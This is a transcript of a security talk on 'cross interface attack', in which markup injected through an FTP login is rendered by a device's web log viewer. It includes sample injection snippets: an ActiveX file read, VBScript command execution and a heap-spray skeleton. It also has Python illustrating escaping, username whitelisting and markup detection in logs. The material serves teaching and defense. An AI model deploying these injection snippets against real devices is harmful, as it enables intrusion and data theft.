Cross interface attack

Post on 21-Jun-2015


A new web attack vector in which a backend login console (FTP, Telnet, etc.) is used to attack the web interface.

Transcript of Cross interface attack

CROSS INTERFACE ATTACK

Piyush Mittal, Security Compass

Introduction

When one interface is used to attack another interface.

Different from XSS

XSS - Entry point is from web to web

CIA - Entry point is from backend login console to web interface

CIA Characteristics

• Exploits the default nature of the FTP / Telnet protocol

• Admin interfaces: { Web, FTP, Telnet }

• Logging module running as root

• DOM and HTML rendered as dynamic content

• Attacks are persistent in nature

• Hardware devices – firewalls, disk stations, management systems etc.

Truth About FTP

• The default design of FTP allows the acceptance of both username and password prior to the authentication process and complete verification.

• No check on the number of login attempts.

• No check on type of characters.

Old Buffer Trick

root@redux$ ftp example.com
Connected to example.com.
220 Disk Station FTP server at DiskStation ready.
User (example.com:(none)):
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA
331 Password required for
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA.
Password:
530 Login incorrect.
Login failed.

Design of the Application

(The slides build this flow up one stage at a time; the complete flow is:)

• FTP Login Interface

• Inject Payload

• FTP Authentication Module

• FTP Logging Module (runs as root or administrator)

• Web Interface (unencoded / unfiltered HTML rendering)
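As an added illustration (not code from the slides or from Security Compass), the following Python models the flow above: the FTP logging module copies a rejected username verbatim into a log line, and the web interface then renders that line. The unsafe renderer reproduces the flaw; the safe renderer shows the fix the deck calls for (HTML-encoding before rendering). The username, client address and log-line format are constructed for the example.

```python
import html
import re

# Constructed sample inputs (not from the slides): a login attempt whose
# "username" is HTML markup, and the client address it came from.
SAMPLE_USERNAME = "<script>alert(1)</script>"
SAMPLE_CLIENT = "203.0.113.5"


def ftp_log_line(username: str, client_ip: str) -> str:
    """Models the FTP logging module in the deck: the rejected username is
    written into the log verbatim, with no filtering (log format is assumed)."""
    return f"FAILED LOGIN user={username} from {client_ip}"


def render_log_unsafe(lines):
    """Models the vulnerable web interface: log text is concatenated straight
    into HTML, so markup that arrived via the FTP console becomes live DOM."""
    rows = "".join(f"<tr><td>{line}</td></tr>" for line in lines)
    return f"<table>{rows}</table>"


def render_log_safe(lines):
    """Hardened viewer: each line is HTML-escaped, so the same log content is
    displayed as text rather than interpreted as markup."""
    rows = "".join(
        f"<tr><td>{html.escape(line, quote=True)}</td></tr>" for line in lines
    )
    return f"<table>{rows}</table>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(rendered_html: str) -> bool:
    """True if the rendered page still carries an unescaped <script> element."""
    return bool(SCRIPT_TAG.search(rendered_html))


def demo():
    """Runs both viewers over one poisoned log line and reports which one
    would hand the injected markup to the browser."""
    log = [ftp_log_line(SAMPLE_USERNAME, SAMPLE_CLIENT)]
    return {
        "unsafe_executes": contains_live_script(render_log_unsafe(log)),
        "safe_executes": contains_live_script(render_log_safe(log)),
    }


if __name__ == "__main__":
    print(demo())
```

The point of the model is that nothing on the FTP side needs to succeed: the login is refused, yet the string still reaches the browser because the log viewer trusts log content as HTML. Escaping at render time is the minimum fix; the DEFENSE slides also want the input rejected earlier and the logger not running as root.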

THREATS

• Information Stealing (sample code and a cookie-stealing demo are shown on the slides)

• Malware Infections - executing payloads to conduct drive-by download attacks (sample code and a drive-by download demo are shown on the slides)

• CSRF (sample code is shown on the slides)

• Turning a network device into an attack pot

Advanced Code Injections

• ActiveX code execution

    // Reads a local file through the Scripting.FileSystemObject ActiveX control
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var XFile = fso.GetFile("c:/business/secret.txt");
    var stream = XFile.OpenAsTextStream(1, 0);   // 1 = ForReading
    var content = stream.ReadAll();

• VBScript code execution

    <!-- Instantiates an ActiveX control by CLSID and calls its Exec method -->
    <object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'></object>
    <script language='vbscript'>
    arg1 = "c:/WINDOWS/system32/calc.exe"
    target.Exec arg1
    </script>

• Heap Spray code execution

    var shellcode = unescape("");                         // payload left empty on the slide
    var heap_block = unescape("%u0a0a%u0a0a");
    var nop_sled = unescape("%u9090%u9090%u9090");        // 0x90 = x86 NOP
    do { heap_block += heap_block; } while (heap_block.length < xxxx);   // xxxx: size not given on the slide
    var memory = new Array();
    for (var ret = 0; ret < 100; ret++) { memory[ret] = heap_block + nop_sled + shellcode; }

• AJAX code execution

DEFENSE

• A whitelist approach should be followed at the protocol level to reduce the impact of exploitation.

• The error reporting mechanism should be used in conjunction with the FTP authentication module to restrict the acceptance of malicious input through login consoles.

• The logging process should not run as administrator or root user.

• The logs should be rendered in a customized format which does not allow DOM and HTML elements to get rendered as dynamic content.

• The Content-Type of rendered log content should be defined explicitly, and the content checked, so that malicious input is not sniffed and rendered as HTML.
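The following Python is an added example (not code from the slides or from Security Compass) of the first two DEFENSE points together with the "Truth About FTP" observations: a whitelist applied to the username before it reaches authentication or logging, a per-client cap on login attempts, and a detection pass over existing log lines that flags entries carrying markup. The whitelist policy, the attempt limit and the sample log format are assumptions made for the example.

```python
import re
from collections import defaultdict

# Assumed whitelist (the deck specifies none): letters, digits, dot,
# underscore, hyphen, 1 to 32 characters. Anything else is refused before
# it can be logged.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")
MAX_ATTEMPTS = 5  # assumed limit; the deck only notes that none exists


def validate_username(username: str) -> bool:
    """Protocol-level whitelist check on the USER argument."""
    return bool(USERNAME_RE.fullmatch(username))


class LoginGate:
    """Front door for the FTP authentication module: refuses malformed
    usernames and locks a client out after too many failures."""

    def __init__(self, max_attempts: int = MAX_ATTEMPTS):
        self.max_attempts = max_attempts
        self.failures = defaultdict(int)

    def accept(self, client_ip: str, username: str) -> str:
        """Returns 'reject-locked', 'reject-input' or 'proceed'. Only
        'proceed' hands the username on to password verification."""
        if self.failures[client_ip] >= self.max_attempts:
            return "reject-locked"
        if not validate_username(username):
            self.failures[client_ip] += 1
            return "reject-input"
        return "proceed"

    def record_failure(self, client_ip: str) -> None:
        """Called by the authentication module when a password check fails."""
        self.failures[client_ip] += 1


# Detection over logs already written by an unfiltered logger: tag names,
# javascript: URLs and inline event handlers in the user field.
MARKUP_MARKERS = re.compile(r"<\s*/?\s*[a-z!]|javascript:|on\w+\s*=", re.IGNORECASE)
LOG_ENTRY_RE = re.compile(r"user=(.*) from (\S+)$")

# Constructed sample log (not real data).
SAMPLE_LOG = """\
2015-06-21 10:00:01 FAILED LOGIN user=alice from 198.51.100.7
2015-06-21 10:00:05 FAILED LOGIN user=<script>alert(1)</script> from 203.0.113.5
2015-06-21 10:00:09 FAILED LOGIN user=bob from 198.51.100.8
2015-06-21 10:00:12 FAILED LOGIN user=<img src=x onerror=alert(1)> from 203.0.113.5
"""


def find_suspicious_entries(log_text: str):
    """Returns (client_ip, username) for each log line whose username
    contains markup, i.e. an attempt to reach the web interface via the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_ENTRY_RE.search(line)
        if m and MARKUP_MARKERS.search(m.group(1)):
            hits.append((m.group(2), m.group(1)))
    return hits


if __name__ == "__main__":
    gate = LoginGate()
    print(gate.accept("203.0.113.5", "<script>alert(1)</script>"))  # reject-input
    for ip, user in find_suspicious_entries(SAMPLE_LOG):
        print(f"suspicious login attempt from {ip}: {user!r}")
```

The whitelist is deliberately narrow: the slides' point is that FTP accepts arbitrary bytes of any length as a username, so the defence is to decide what a username may look like and refuse the rest before the logging module ever sees it. The detection pass is for the logs a device has already accumulated.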

Questions?

When in doubt, it's better to ask.

References

• http://www.google.co.in/search?q=http%3A%2F%2Fmilw0rm.com%2Fexploits%2F6476&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a#sclient=psy-ab&hl=en&client=firefox-a&rls=org.mozilla:en-US%3Aofficial&source=hp&q=cross+interface+attack&pbx=1&oq=cross+interface+attack&aq=f&aqi=&aql=&gs_sm=e&gs_upl=37279l38938l11l40023l2l2l0l0l0l0l268l492l2-2l2l0&bav=on.2,or.r_gc.r_pw.&fp=a0ba24de15e40bac&biw=1366&bih=558

• http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2453

• http://www.securityfocus.com/archive/1/archive/1/513970/100/0/threaded

THANKS